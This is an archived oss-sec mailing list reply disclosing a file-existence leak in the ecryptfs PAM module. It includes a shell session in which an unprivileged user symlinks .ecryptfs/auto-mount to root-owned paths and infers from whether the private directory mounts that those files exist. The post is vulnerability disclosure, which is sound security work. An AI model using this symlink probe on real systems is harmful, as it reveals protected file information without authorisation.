oss-sec mailing list archives
Re: Re: ecryptfs headsup
From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Sat, 14 Jul 2012 09:18:27 +0200
Looks like another issue with that pam module. I can determine whether or not any file exists as an unprivileged user: We make sure that we have an existing root file and a non-existing root file: zx2c4@bwog ~ $ sudo touch /root/this-file-exists zx2c4@bwog ~ $ sudo rm -f /root/this-file-does-not-exist We double check that zx2c4 can't know about them: zx2c4@bwog ~ $ stat /root/this-file-exists stat: cannot stat `/root/this-file-exists': Permission denied zx2c4@bwog ~ $ stat /root/this-file-does-not-exist stat: cannot stat `/root/this-file-does-not-exist': Permission denied zx2c4@bwog ~ $ ls /root ls: cannot open directory /root: Permission denied We replace .ecryptfs/auto-mount with a symlink to a root file that does not exist: zx2c4@bwog ~ $ rm -f .ecryptfs/auto-mount zx2c4@bwog ~ $ ln -s /root/this-file-does-not-exist .ecryptfs/auto-mount And we see that our private directory doesn't get mounted: zx2c4@bwog ~ $ sudo login zx2c4 Password: Last login: Sat Jul 14 03:07:33 EDT 2012 on pts/5 zx2c4@bwog ~ $ mount|grep ecrypt zx2c4@bwog ~ $ exit We next replace .ecryptfs/auto-mount with a symlink to a root file that *does* exist: zx2c4@bwog ~ $ rm -f .ecryptfs/auto-mount zx2c4@bwog ~ $ ln -s /root/this-file-exists .ecryptfs/auto-mount And we see that it does in fact get mounted: zx2c4@bwog ~ $ sudo login zx2c4 Password: Last login: Sat Jul 14 03:09:10 EDT 2012 on pts/5 zx2c4@bwog ~ $ mount|grep ecrypt /home/zx2c4/.Private on /home/zx2c4/Private type ecryptfs (ecryptfs_check_dev_ruid,ecryptfs_sig=e38bb31e419c9f03,ecryptfs_fnek_sig=5e2b499985de965d,ecryptfs_cipher=aes,ecryptfs_key_bytes=16,ecryptfs_unlink_sigs) File existence disclosure.
Current thread:
- Re: ecryptfs headsup, (continued)
- Re: ecryptfs headsup Dan Rosenberg (Jul 10)
- Re: ecryptfs headsup Tyler Hicks (Jul 10)
- Re: ecryptfs headsup Tyler Hicks (Jul 10)
- Re: ecryptfs headsup Dustin Kirkland (Jul 11)
- Re: ecryptfs headsup Kurt Seifried (Jul 11)
- Re: Re: ecryptfs headsup Tyler Hicks (Jul 11)
- Re: Re: ecryptfs headsup Kurt Seifried (Jul 11)
- Re: Re: ecryptfs headsup Tyler Hicks (Jul 11)
- Re: Re: ecryptfs headsup Dustin Kirkland (Jul 13)
- Re: Re: ecryptfs headsup Jason A. Donenfeld (Jul 13)
- Re: Re: ecryptfs headsup Jason A. Donenfeld (Jul 14)
- Re: Re: ecryptfs headsup Sebastian Krahmer (Jul 16)
- Re: Re: ecryptfs headsup Justin Ossevoort (Jul 16)